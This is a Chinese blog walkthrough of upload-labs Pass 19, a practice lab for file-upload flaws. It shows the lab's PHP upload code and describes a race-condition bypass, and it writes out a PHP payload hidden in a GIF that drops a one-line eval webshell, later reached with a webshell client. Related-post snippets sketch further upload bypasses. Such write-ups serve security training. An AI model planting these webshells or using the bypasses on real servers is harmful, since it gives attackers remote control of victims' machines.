uplload 通关纪实 pass19

最新推荐文章于 2023-11-04 21:39:52 发布
最新推荐文章于 2023-11-04 21:39:52 发布
阅读量133 收藏
点赞数
分类专栏: upload 通关纪实
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56378124/article/details/118387314
版权 
//index.php
$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{
    require_once("./myupload.php");
    $imgFileName =time();
    $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
    $status_code = $u->upload(UPLOAD_PATH);
    switch ($status_code) {
        case 1:
            $is_upload = true;
            $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
            break;
        case 2:
            $msg = '文件已经被上传,但没有重命名。';
            break; 
        case -1:
            $msg = '这个文件不能上传到服务器的临时文件存储目录。';
            break; 
        case -2:
            $msg = '上传失败,上传目录不可写。';
            break; 
        case -3:
            $msg = '上传失败,无法上传该类型文件。';
            break; 
        case -4:
            $msg = '上传失败,上传的文件过大。';
            break; 
        case -5:
            $msg = '上传失败,服务器已经存在相同名称文件。';
            break; 
        case -6:
            $msg = '文件无法上传,文件不能复制到目标目录。';
            break;      
        default:
            $msg = '未知错误!';
            break;
    }
}

//myupload.php
class MyUpload{
......
......
...... 
  var $cls_arr_ext_accepted = array(
      ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
      ".html", ".xml", ".tiff", ".jpeg", ".png" );

......
......
......  
  /** upload()
   **
   ** Method to upload the file.
   ** This is the only method to call outside the class.
   ** @para String name of directory we upload to
   ** @returns void
  **/
  function upload( $dir ){
    
    $ret = $this->isUploadedFile();
    
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->setDir( $dir );
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkExtension();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkSize();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }
    
    // if flag to check if the file exists is set to 1
    
    if( $this->cls_file_exists == 1 ){
      
      $ret = $this->checkFileExists();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }

    // if we are here, we are ready to move the file to destination

    $ret = $this->move();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }

    // check if we need to rename the file

    if( $this->cls_rename_file == 1 ){
      $ret = $this->renameFile();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }
    
    // if we are here, everything worked as planned :)

    return $this->resultUpload( "SUCCESS" );
  
  }
......
......
...... 
};

Pass-19和Pass-18一样,同样利用条件竞争漏洞。将<?php fputs(fopen('2.php','w'),'<?php @eval($_POST["pass"]);?>’);?>插入到gif图片中,这里就不做演示了。
然后上传19.gif文件,同时用burpsuite进行抓包:
在这里插入图片描述
然后访问抓到的包中回显的图片地址,成功访问到,如下图所示:
在这里插入图片描述
与此同时,生成了一个2.php文件:
在这里插入图片描述
然后用菜刀连接这个2.php:
在这里插入图片描述
成功访问到:

安全界 的彭于晏
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
UPLOAD-lab 1-19关
感恩
10-08 329
UPLOAD-LABS
WebGoat通关详解.zip
最新发布
03-22
"WebGoat通关详解.zip"这个压缩包文件很可能包含了一步步指导用户如何完成WebGoat所有挑战的详细教程。 在描述中提到的"webgoat通关"意味着这个资源将带领用户了解如何解决WebGoat中的各种安全问题,从基础到高级,...
upload-labs pass19
qq_45106794的博客
11-07 372
upload -labs pass19 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml"...
upload-labs】————20、Pass-19
Fly_鹏程万里
08-15 347
查看源代码: 本关考察CVE-2015-2348 move_uploaded_file() 00截断,上传webshell,同时自定义保存名称,直接保存为php是不行的 %00截断 浏览器中访问: ...
upload-labs_pass19_条件竞争+apache解析漏洞
qq_51550750的博客
04-12 1617
pass19-源码和提示 提示: 源码: //index.php $is_upload = false; $msg = null; if (isset($_POST['submit'])) { require_once("./myupload.php"); $imgFileName =time(); $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FIL
upload-labs】pass-19~pass20完结篇
qq_43665434的博客
03-23 701
upload-labs】pass-19~pass20完结篇 【pass-19】00截断 1、源码分析 2、测试流程 先尝试上传一个一句话木马muma.php 用burp抓包: 在raw中将加号的2b替换为null的00 变换后结果: 如图所示,上传成功! 然后直接菜刀连接即可。 小结 00截断的原理前面提到过,不明白的小伙伴可以取看看传送门 我觉得是否可以利用00截断的本质,还是要看最后文件的保存路径用户是否可控。 【pass-20】特殊+windows特性绕过 1、源码分析 if (iss
00054管理学原理-通关宝典
02-06
管理学原理是研究组织管理活动及其规律的学科,它涵盖了管理的本质、职能、管理者等多个方面。在准备00054管理学原理的考试时,考生需要熟悉各种题型,如单项选择题、多项选择题、判断说明题、简答题、论述题以及...
中国海关-通关参数查询表
04-26
中国行政区代码表(ECIQ) 中国海关关区代码表 全球国家地区代码表(3位码) 全球港口代码表 检验检疫名称(HS编码)
upload-master-pass19
diemozao8175的博客
08-18 124
第十九关 move_uploaded_file() 00截断 在70 68 70后面的值修改为00,进行截断 修改之后,19.php后面多了一个小方格 然后上传 验证 转载于:https://www.cnblogs.com/gaonuoqi/p/11372184.html...
upload-labs19记录
weixin_33674976的博客
01-10 235
upload-labs19记录 本次做题为白盒,因为只是fuzz的话并不能学到什么,所以从漏洞源下手。 前端校验 Pass1 源码 function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || fil...
PASS2019Setup_v19_0_1.zip
06-30
PASS软件最新版
upload-labs19-20以及总结1
08-08
第一步:直接上传php文件,保存名称填成PHP第二步:抓包分析可以看到filename是文件本来的名称,而save_name是传递的参数,此处改为PHP可以绕过
upload-labs 19
LuckySec
11-09 1016
题目 查看代码 分析,move_uploaded_file()函数中的img_path是由post参数save_name控制的, 因此可以在save_name利用00截断绕过: 首先上传一个图片马 修改信息为红线处 然后在二进制将+号对应的2b改为00 最后继续上传 验证 文件绕过成功! ...
upload-labs pass13-19
hclimg的博客
08-02 432
pass-13: 查看提示: 这个只要上传图片码到服务器即可 先绕过文件头检查,添加GIF图片的文件头GIF89a,绕过图片检查 发现上传成功,但是查看图片信息发现被重命名了而且后缀改为了jpg格式的 那么制作图片码上传,将php一句话追加到jpg图片末尾 copy xx.jpg /b + shell.php /a webshell.jpg 用文本打开图片码,在最后发现一句话木马已经被添加...
文件上传upload-labs 第19关 Apache解析漏洞配合条件竞争
YYYYU_ZHIZZZ的博客
11-04 520
Apache解析漏洞之配置漏洞,windows环境下怎么配合条件竞争,time()函数的原理,以及对mime类型的理解。
文件上传漏洞——upload-labs 1-19 (详解)
m0_62879498的博客
02-19 6834
upload-labs-1 删除 js 进行绕过 上传图片,发现上传成功 上传 shell 发现: 发现是白名单,所以由前面我们知道,极有可能在前端存在过滤,我们检查一下: 发现 checkFile() 起到了检查过滤的效果,我们将其删去并提交 发现: 然后用中国以蚁剑 进行链接 发现成功 发现成功 同时我们发现仅仅在前端进行过滤是远远不够的,我们可以轻易的删去,所以除了前端,后端也必须进行校验 如果我们在使用蚁剑发现了返回值为空说明一句话木马语法错误,如果我们发现返回值是一串乱码 则是链接地址
upload-labs(Pass1-19详解)
m0_53567065的博客
11-10 2278
​ 文件上传也是和RCE类型的危害相同的,如果我们可以任意上传文件且服务器可以解析的话那么就相当于我们可以执行任意的文件代码,从而控制了整个服务器。在实战渗透中,我们打点最快的方式就是寻找是否存在文件上传的功能点。不过一般都是后台会存在这样的功能点且漏洞较多。一旦我们将文件传到服务器之后,就可以通过webshell管理工具进行连接。上传文件之前我们需要先清楚web服务是基于什么语言开发的,是否会将我们的文件进行解析。当然这个都需要我们实际进行测试。
upload-labs之第十九和二十关以及总结
田田云逸的博客
10-28 1554
Pass19 打开第十九关,发现上传的地方还可以定义上传的文件名 再看看提示 这里说这个文件名是用的post方式传递的,那么看看源码到底要怎么绕过 $is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array("php","php5","php4","php3","php2","html","htm".
upload-labs靶场通关指南(18-19关)
永远是少年
09-16 974
今天继续给大家介绍渗透测试相关知识,本文主要内容是upload-labs靶场通关指南(18-19关)。 一、第18关 二、第19关
upload-labs靶场通关pass04
09-14
要通过upload-labs靶场的pass04,您需要进行以下步骤: 1. 首先,上传一个符合格式的PHP脚本文件,并将其扩展名改为图片格式。根据引用中的描述,您需要将.htaccess文件上传到服务器。.htaccess文件是Apache服务器用来进行伪静态配置的文件,可以通过该文件来控制URL的重写和重定向等操作。确保您已经成功上传了.htaccess文件。 2. 根据引用中提供的代码片段,上传文件的表单提交后会对文件名进行处理,并将上传的文件保存到指定的路径中。上传成功后,$is_upload变量将被设置为true。 3. 检查是否已经成功上传文件。根据引用中的代码,如果$is_upload变量为true,则表示文件上传成功。在上传完成后,您可以继续进行下一步操作。 4. 至此,您已经成功通过upload-labs靶场的pass04。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值